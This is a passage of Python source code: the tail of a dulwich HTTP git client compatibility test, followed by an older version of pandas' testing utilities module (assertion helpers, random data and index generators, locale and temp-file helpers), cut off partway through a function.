threading.Thread(target=self._httpd.serve_forever).start()
run_git_or_fail(["config", "http.uploadpack", "true"], cwd=self.dest)
run_git_or_fail(["config", "http.receivepack", "true"], cwd=self.dest)
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
self._httpd.shutdown()
self._httpd.socket.close()
def _client(self):
return client.HttpGitClient(self._httpd.get_url())
def _build_path(self, path):
return path
def test_archive(self):
raise SkipTest("exporting archives not supported over http")
|
testing.py
|
from __future__ import division
# pylint: disable-msg=W0402
import random
import re
import string
import sys
import tempfile
import warnings
import inspect
import os
import subprocess
import locale
import unittest
import traceback
from datetime import datetime
from functools import wraps, partial
from contextlib import contextmanager
from distutils.version import LooseVersion
from numpy.random import randn, rand
import numpy as np
from numpy.testing import assert_array_equal
import pandas as pd
from pandas.core.common import is_sequence, array_equivalent, is_list_like, is_number
import pandas.compat as compat
from pandas.compat import(
filter, map, zip, range, unichr, lrange, lmap, lzip, u, callable, Counter,
raise_with_traceback, httplib
)
from pandas.computation import expressions as expr
from pandas import (bdate_range, CategoricalIndex, DatetimeIndex, TimedeltaIndex, PeriodIndex,
Index, MultiIndex, Series, DataFrame, Panel, Panel4D)
from pandas.util.decorators import deprecate
from pandas import _testing
from pandas.io.common import urlopen
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get('PANDAS_TESTING_MODE','None')
if 'deprecate' in testing_mode:
warnings.simplefilter('always', DeprecationWarning)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get('PANDAS_TESTING_MODE','None')
if 'deprecate' in testing_mode:
warnings.simplefilter('ignore', DeprecationWarning)
set_testing_mode()
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pd.set_option('chained_assignment', 'raise')
@classmethod
def tearDownClass(cls):
pass
def reset_display_options(self):
# reset the display options
pd.reset_option('^display.', silent=True)
def round_trip_pickle(self, obj, path=None):
if path is None:
path = u('__%s__.pickle' % rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
# https://docs.python.org/3/library/unittest.html#deprecated-aliases
def assertEquals(self, *args, **kwargs):
return deprecate('assertEquals', self.assertEqual)(*args, **kwargs)
def assertNotEquals(self, *args, **kwargs):
return deprecate('assertNotEquals', self.assertNotEqual)(*args, **kwargs)
def assert_(self, *args, **kwargs):
return deprecate('assert_', self.assertTrue)(*args, **kwargs)
def assertAlmostEquals(self, *args, **kwargs):
return deprecate('assertAlmostEquals', self.assertAlmostEqual)(*args, **kwargs)
def assertNotAlmostEquals(self, *args, **kwargs):
return deprecate('assertNotAlmostEquals', self.assertNotAlmostEqual)(*args, **kwargs)
# NOTE: don't pass an NDFrame or index to this function - may not handle it
# well.
assert_almost_equal = _testing.assert_almost_equal
assert_dict_equal = _testing.assert_dict_equal
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits),
dtype=(np.str_, 1))
RANDU_CHARS = np.array(list(u("").join(map(unichr, lrange(1488, 1488 + 26))) +
string.digits), dtype=(np.unicode_, 1))
def rands_array(nchars, size, dtype='O'):
"""Generate an array of byte strings."""
retval = (choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars)).reshape(size))
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype='O'):
"""Generate an array of unicode strings."""
retval = (choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars)).reshape(size))
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return ''.join(choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return ''.join(choice(RANDU_CHARS, nchars))
def choice(x, size=10):
"""sample with replacement; uniform over the input"""
try:
return np.random.choice(x, size=size)
except AttributeError:
return np.random.randint(len(x), size=size).choose(x)
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
def _skip_if_32bit():
import nose
import struct
if struct.calcsize("P") * 8 < 64:
raise nose.SkipTest("skipping for 32 bit")
def mplskip(cls):
"""Skip a TestCase instance if matplotlib isn't installed"""
@classmethod
def setUpClass(cls):
try:
import matplotlib as mpl
mpl.use("Agg", warn=False)
except ImportError:
import nose
raise nose.SkipTest("matplotlib not installed")
cls.setUpClass = setUpClass
return cls
def _skip_if_no_scipy():
try:
import scipy.stats
except ImportError:
import nose
raise nose.SkipTest("no scipy.stats module")
try:
import scipy.interpolate
except ImportError:
import nose
raise nose.SkipTest('scipy.interpolate missing')
def _skip_if_no_pytz():
try:
import pytz
except ImportError:
import nose
raise nose.SkipTest("pytz not installed")
def _skip_if_no_dateutil():
try:
import dateutil
except ImportError:
import nose
raise nose.SkipTest("dateutil not installed")
def _skip_if_no_cday():
from pandas.core.datetools import cday
if cday is None:
import nose
raise nose.SkipTest("CustomBusinessDay not available.")
#------------------------------------------------------------------------------
# locale utilities
def check_output(*popenargs, **kwargs): # shamelessly taken from Python 2.7 source
r"""Run command with arguments and return its output as a byte string.
If the exit code was non-zero it raises a CalledProcessError. The
CalledProcessError object will have the return code in the returncode
attribute and output in the output attribute.
The arguments are the same as for the Popen constructor. Example:
>>> check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
The stdout argument is not allowed as it is used internally.
To capture standard error in the result, use stderr=STDOUT.
>>> check_output(["/bin/sh", "-c",
... "ls -l non_existent_file ; exit 0"],
... stderr=STDOUT)
'ls: non_existent_file: No such file or directory\n'
"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE,stderr=subprocess.PIPE,
*popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
def _default_locale_getter():
try:
raw_locales = check_output(['locale -a'], shell=True)
except subprocess.CalledProcessError as e:
raise type(e)("%s, the 'locale -a' command cannot be found on your "
"system" % e)
return raw_locales
def get_locales(prefix=None, normalize=True,
locale_getter=_default_locale_getter):
"""Get all the locales that are available on the system.
Parameters
----------
prefix : str
If not ``None`` then return only those locales with the prefix
provided. For example to get all English language locales (those that
start with ``"en"``), pass ``prefix="en"``.
normalize : bool
Call ``locale.normalize`` on the resulting list of available locales.
If ``True``, only locales that can be set without throwing an
``Exception`` are returned.
locale_getter : callable
The function to use to retrieve the current locales. This should return
a string with each locale separated by a newline character.
Returns
-------
locales : list of strings
A list of locale strings that can be set with ``locale.setlocale()``.
For example::
locale.setlocale(locale.LC_ALL, locale_string)
On error will return None (no locale available, e.g. Windows)
"""
try:
raw_locales = locale_getter()
except:
return None
try:
# raw_locales is "\n" seperated list of locales
# it may contain non-decodable parts, so split
# extract what we can and then rejoin.
raw_locales = raw_locales.split(b'\n')
out_locales = []
for x in raw_locales:
if compat.PY3:
out_locales.append(str(x, encoding=pd.options.display.encoding))
else:
out_locales.append(str(x))
except TypeError:
pass
if prefix is None:
return _valid_locales(out_locales, normalize)
found = re.compile('%s.*' % prefix).findall('\n'.join(out_locales))
return _valid_locales(found, normalize)
@contextmanager
def set_locale(new_locale, lc_var=locale.LC_ALL):
"""Context manager for temporarily setting a locale.
Parameters
----------
new_locale : str or tuple
A string of the form <language_country>.<encoding>. For example to set
the current locale to US English with a UTF8 encoding, you would pass
"en_US.UTF-8".
Notes
-----
This is useful when you want to run a particular block of code under a
particular locale, without globally setting the locale. This probably isn't
thread-safe.
"""
current_locale = locale.getlocale()
try:
locale.setlocale(lc_var, new_locale)
try:
normalized_locale = locale.getlocale()
except ValueError:
yield new_locale
else:
if all(lc is not None for lc in normalized_locale):
yield '.'.join(normalized_locale)
else:
yield new_locale
finally:
locale.setlocale(lc_var, current_locale)
def _can_set_locale(lc):
"""Check to see if we can set a locale without throwing an exception.
Parameters
----------
lc : str
The locale to attempt to set.
Returns
-------
isvalid : bool
Whether the passed locale can be set
"""
try:
with set_locale(lc):
pass
except locale.Error: # horrible name for a Exception subclass
return False
else:
return True
def _valid_locales(locales, normalize):
"""Return a list of normalized locales that do not throw an ``Exception``
when set.
Parameters
----------
locales : str
A string where each locale is separated by a newline.
normalize : bool
Whether to call ``locale.normalize`` on each locale.
Returns
-------
valid_locales : list
A list of valid locales.
"""
if normalize:
normalizer = lambda x: locale.normalize(x.strip())
else:
normalizer = lambda x: x.strip()
return list(filter(_can_set_locale, map(normalizer, locales)))
#------------------------------------------------------------------------------
# Console debugging tools
def debug(f, *args, **kwargs):
from pdb import Pdb as OldPdb
try:
from IPython.core.debugger import Pdb
kw = dict(color_scheme='Linux')
except ImportError:
Pdb = OldPdb
kw = {}
pdb = Pdb(**kw)
return pdb.runcall(f, *args, **kwargs)
def pudebug(f, *args, **kwargs):
import pudb
return pudb.runcall(f, *args, **kwargs)
def set_trace():
from IPython.core.debugger import Pdb
try:
Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
except:
from pdb import Pdb as OldPdb
OldPdb().set_trace(sys._getframe().f_back)
#------------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ''
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import nose
raise nose.SkipTest('no unicode file names on this system')
try:
yield filename
finally:
try:
os.close(fd)
except Exception as e:
print("Couldn't close file descriptor: %d (file: %s)" %
(fd, filename))
try:
if os.path.exists(filename):
os.remove(filename)
except Exception as e:
print("Exception on removing file: %s" % e)
def get_data_path(f=''):
"""Return the path of a data file, these are relative to the current test
directory.
"""
# get our callers file
_, filename, _, _, _, _ = inspect.getouterframes(inspect.currentframe())[1]
base_dir = os.path.abspath(os.path.dirname(filename))
return os.path.join(base_dir, 'data', f)
#------------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_equal(a, b, msg=""):
"""asserts that a equals b, like nose's assert_equal, but allows custom message to start.
Passes a and b to format string as well. So you can use '{0}' and '{1}' to display a and b.
Examples
--------
>>> assert_equal(2, 2, "apples")
>>> assert_equal(5.2, 1.2, "{0} was really a dead parrot")
Traceback (most recent call last):
...
AssertionError: 5.2 was really a dead parrot: 5.2 != 1.2
"""
assert a == b, "%s: %r != %r" % (msg.format(a,b), a, b)
def assert_index_equal(left, right, exact=False, check_names=True):
assertIsInstance(left, Index, '[index] ')
assertIsInstance(right, Index, '[index] ')
if not left.equals(right) or (exact and type(left) != type(right)):
raise AssertionError("[index] left [{0} {1}], right [{2} {3}]".format(left.dtype,
left,
right,
right.dtype))
if check_names:
assert_attr_equal('names', left, right)
def assert_attr_equal(attr, left, right):
"""checks attributes are equal. Both objects must have attribute."""
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
assert_equal(left_attr,right_attr,"attr is not equal [{0}]" .format(attr))
def isiterable(obj):
return hasattr(obj, '__iter__')
def is_sorted(seq):
return assert_almost_equal(seq, np.sort(np.array(seq)))
def assertIs(first, second, msg=''):
"""Checks that 'first' is 'second'"""
a, b = first, second
assert a is b, "%s: %r is not %r" % (msg.format(a, b), a, b)
def assertIsNot(first, second, msg=''):
"""Checks that 'first' is not 'second'"""
a, b = first, second
assert a is not b, "%s: %r is %r" % (msg.format(a, b), a, b)
def assertIn(first, second, msg=''):
"""Checks that 'first' is in 'second'"""
a, b = first, second
assert a in b, "%s: %r is not in %r" % (msg.format(a, b), a, b)
def assertNotIn(first, second, msg=''):
"""Checks that 'first' is not in 'second'"""
a, b = first, second
assert a not in b, "%s: %r is in %r" % (msg.format(a, b), a, b)
def assertIsNone(expr, msg=''):
"""Checks that 'expr' is None"""
return assertIs(expr, None, msg)
def assertIsNotNone(expr, msg=''):
"""Checks that 'expr' is not None"""
return assertIsNot(expr, None, msg)
def assertIsInstance(obj, cls, msg=''):
"""Test that obj is an instance of cls
(which can be a class or a tuple of classes,
as supported by isinstance())."""
assert isinstance(obj, cls), (
"%sExpected object to be of type %r, found %r instead" % (
msg, cls, type(obj)))
def assert_isinstance(obj, class_type_or_tuple, msg=''):
return deprecate('assert_isinstance', assertIsInstance)(obj, class_type_or_tuple, msg=msg)
def assertNotIsInstance(obj, cls, msg=''):
"""Test that obj is not an instance of cls
(which can be a class or a tuple of classes,
as supported by isinstance())."""
assert not isinstance(obj, cls), (
"%sExpected object to be of type %r, found %r instead" % (
msg, cls, type(obj)))
def assert_categorical_equal(res, exp):
if not array_equivalent(res.categories, exp.categories):
raise AssertionError(
'categories not equivalent: {0} vs {1}.'.format(res.categories,
exp.categories))
if not array_equivalent(res.codes, exp.codes):
raise AssertionError(
'codes not equivalent: {0} vs {1}.'.format(res.codes, exp.codes))
if res.ordered != exp.ordered:
raise AssertionError("ordered not the same")
if res.name != exp.name:
raise AssertionError("name not the same")
def assert_numpy_array_equal(np_array, assert_equal):
"""Checks that 'np_array' is equal to 'assert_equal'
Note that the expected array should not contain `np.nan`!
Two numpy arrays are equal if all
elements are equal, which is not possible if `np.nan` is such an element!
If the expected array includes `np.nan` use
`assert_numpy_array_equivalent(...)`.
"""
if np.array_equal(np_array, assert_equal):
return
raise AssertionError(
'{0} is not equal to {1}.'.format(np_array, assert_equal))
def assert_numpy_array_equivalent(np_array, assert_equal, strict_nan=False):
"""Checks that 'np_array' is equivalent to 'assert_equal'
Two numpy arrays are equivalent if the arrays have equal non-NaN elements,
and `np.nan` in corresponding locations.
If the the expected array does not contain `np.nan`
`assert_numpy_array_equivalent` is the similar to
`assert_numpy_array_equal()`. If the expected array includes
`np.nan` use this
function.
"""
if array_equivalent(np_array, assert_equal, strict_nan=strict_nan):
return
raise AssertionError(
'{0} is not equivalent to {1}.'.format(np_array, assert_equal))
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(left, right, check_dtype=True,
check_index_type=False,
check_series_type=False,
check_less_precise=False,
check_exact=False,
check_names=True):
if check_series_type:
assertIsInstance(left, type(right))
if check_dtype:
assert_attr_equal('dtype', left, right)
if check_exact:
if not np.array_equal(left.values, right.values):
raise AssertionError('{0} is not equal to {1}.'.format(left.values,
right.values))
else:
assert_almost_equal(left.values, right.values, check_less_precise)
if check_less_precise:
assert_almost_equal(
left.index.values, right.index.values, check_less_precise)
else:
assert_index_equal(left.index, right.index, check_names=check_names)
if check_index_type:
for level in range(left.index.nlevels):
lindex = left.index.get_level_values(level)
rindex = right.index.get_level_values(level)
assertIsInstance(lindex, type(rindex))
assert_attr_equal('dtype', lindex, rindex)
assert_attr_equal('inferred_type', lindex, rindex)
if check_names:
if is_number(left.name) and np.isnan(left.name):
# Series.name can be np.nan in some test cases
assert is_number(right.name) and np.isnan(right.name)
elif left.name is pd.NaT:
assert right.name is pd.NaT
else:
assert_attr_equal('name', left, right)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(left, right, check_dtype=True,
check_index_type=False,
check_column_type=False,
check_frame_type=False,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False):
if check_frame_type:
assertIsInstance(left, type(right))
assertIsInstance(left, DataFrame)
assertIsInstance(right, DataFrame)
if check_less_precise:
if not by_blocks:
assert_almost_equal(left.columns, right.columns)
assert_almost_equal(left.index, right.index)
else:
if not by_blocks:
assert_index_equal(left.columns, right.columns, check_names=check_names)
# compare by blocks
if by_blocks:
rblocks = right.blocks
lblocks = left.blocks
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(lblocks[dtype],rblocks[dtype], check_dtype=check_dtype)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.icol(i)
rcol = right.icol(i)
assert_series_equal(lcol, rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names)
if check_index_type:
for level in range(left.index.nlevels):
lindex = left.index.get_level_values(level)
rindex = right.index.get_level_values(level)
assertIsInstance(lindex, type(rindex))
assert_attr_equal('dtype', lindex, rindex)
assert_attr_equal('inferred_type', lindex, rindex)
if check_column_type:
assertIsInstance(left.columns, type(right.columns))
assert_attr_equal('dtype', left.columns, right.columns)
assert_attr_equal('inferred_type', left.columns, right.columns)
if check_names:
assert_attr_equal('names', left.index, right.index)
assert_attr_equal('names', left.columns, right.columns)
def assert_panelnd_equal(left, right,
check_panel_type=False,
check_less_precise=False,
assert_func=assert_frame_equal,
check_names=False):
if check_panel_type:
assertIsInstance(left, type(right))
for axis in ['items', 'major_axis', 'minor_axis']:
left_ind = getattr(left, axis)
right_ind = getattr(right, axis)
assert_index_equal(left_ind, right_ind, check_names=check_names)
for i, item in enumerate(left._get_axis(0)):
assert item in right, "non-matching item (right) '%s'" % item
litem = left.iloc[i]
ritem = right.iloc[i]
assert_func(litem, ritem, check_less_precise=check_less_precise)
for i, item in enumerate(right._get_axis(0)):
assert item in left, "non-matching item (left) '%s'" % item
# TODO: strangely check_names fails in py3 ?
_panel_frame_equal = partial(assert_frame_equal, check_names=False)
assert_panel_equal = partial(assert_panelnd_equal,
assert_func=_panel_frame_equal)
assert_panel4d_equal = partial(assert_panelnd_equal,
assert_func=assert_panel_equal)
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '%r'" % k
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements comparable with assert_almost_equal
Checks that the elements are equal, but not the same object. (Does not
check that items in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
assert elem1 is not elem2, "Expected object %r and object %r to be different objects, were same." % (
type(elem1), type(elem2))
def getCols(k):
return string.ascii_uppercase[:k]
def getArangeMat():
return np.arange(N * K).reshape((N, K))
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k))
def makeCategoricalIndex(k=10, n=3, name=None):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(np.random.choice(x,k), name=name)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False,True], name=name)
return Index([False,True] + [False]*(k-2), name=name)
def makeIntIndex(k=10, name=None):
return Index(lrange(k), name=name)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq='B', name=None):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name)
def makeTimedeltaIndex(k=10, freq='D', name=None):
return TimedeltaIndex(start='1 day', periods=k, freq=freq, name=name)
def makePeriodIndex(k=10, name=None):
dt = datetime(2000, 1, 1)
dr = PeriodIndex(start=dt, periods=k, freq='B', name=name)
return dr
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [makeIntIndex, makeFloatIndex, makeStringIndex,
makeUnicodeIndex, makeDateIndex, makePeriodIndex,
makeTimedeltaIndex, makeBoolIndex,
makeCategoricalIndex]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-seires.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
dateIndex = makeDateIndex(N)
dateIndex = Index(dateIndex, dtype=object)
index = makeStringIndex(N)
return Series(dateIndex, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return dict((c, Series(randn(N), index=index)) for c in getCols(K))
def makeTimeSeries(nper=None, freq='B', name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq='B'):
return dict((c, makeTimeSeries(nper, freq)) for c in getCols(K))
def getPeriodData(nper=None):
return dict((c, makePeriodSeries(nper)) for c in getCols(K))
# make frame
def makeTimeDataFrame(nper=None, freq='B'):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(['a', 'b', 'c', 'd', 'e'])
data = {
'A': [0., 1., 2., 3., 4.],
'B': [0., 1., 0., 1., 0.],
'C': ['foo1', 'foo2', 'foo3', 'foo4', 'foo5'],
'D': bdate_range('1/1/2009', periods=5)
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makePanel(nper=None):
cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]
data = dict((c, makeTimeDataFrame(nper)) for c in cols)
return Panel.fromDict(data)
def makePeriodPanel(nper=None):
cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]
data = dict((c, makePeriodFrame(nper)) for c in cols)
return Panel.fromDict(data)
def makePanel4D(nper=None):
return Panel4D(dict(l1=makePanel(nper), l2=makePanel(nper),
l3=makePanel(nper)))
def makeCustomIndex(nentries, nlevels, prefix='#', names=False, ndupe_l=None,
idx_type=None):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default names,
if false will use no names, if a list is given, the name of each level
in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert (is_sequence(ndupe_l) and len(ndupe_l) <= nlevels)
assert (names is None or names is False
or names is True or len(names) is nlevels)
assert idx_type is None or \
(idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and nlevels == 1)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singelton case uniform
if isinstance(names, compat.string_types) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(i=makeIntIndex, f=makeFloatIndex, s=makeStringIndex,
u=makeUnicodeIndex, dt=makeDateIndex, td=makeTimedeltaIndex,
p=makePeriodIndex).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError('"%s" is not a legal value for `idx_type`, use '
'"i"/"f"/"s"/"u"/"dt/"p"/"td".' % idx_type)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all([x > 0 for x in ndupe_l])
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub("[^\d_]_?", "", x).split("_")
return lmap(int, numeric_tuple)
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = prefix + '_l%d_g' % i + str(j)
cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = lzip(*tuples)
# convert tuples to index
if nentries == 1:
index = Index(tuples[0], name=names[0])
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(nrows, ncols, c_idx_names=True, r_idx_names=True,
c_idx_nlevels=1, r_idx_nlevels=1, data_gen_f=None,
c_ndupe_l=None, r_ndupe_l=None, dtype=None,
c_idx_type=None, r_idx_type=None):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value at that position,
the default generator used yields values of the form "RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding index.
The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of
length N < idx_nlevels, for just the first N levels. If ndupe
doesn't divide nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjuncion with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated twice on first level,
# default names on both axis, single index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or \
(r_idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and r_idx_nlevels == 1)
assert c_idx_type is None or \
(c_idx_type in ('i', 'f', 's', 'u', 'dt', 'p', 'td') and c_idx_nlevels == 1)
columns = makeCustomIndex(ncols, nlevels=c_idx_nlevels, prefix='C',
names=c_idx_names, ndupe_l=c_ndupe_l,
idx_type=c_idx_type)
index = makeCustomIndex(nrows, nlevels=r_idx_nlevels, prefix='R',
names=r_idx_names, ndupe_l=r_ndupe_l,
idx_type=r_idx_type)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R%dC%d" % (r, c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1. / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(nrows, ncols, density=.9, random_state=None,
c_idx_names=True, r_idx_names=True,
c_idx_nlevels=1, r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None, r_ndupe_l=None, dtype=None,
c_idx_type=None, r_idx_type=None):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(nrows, ncols, c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l, r_ndupe_l=r_ndupe_l,
dtype=dtype, c_idx_type=c_idx_type,
r_idx_type=r_idx_type)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density,
random_state=random_state)
df.values[i, j] = np.nan
return df
def add_nans(panel):
I, J, N = panel.shape
for i, item in enumerate(panel.items):
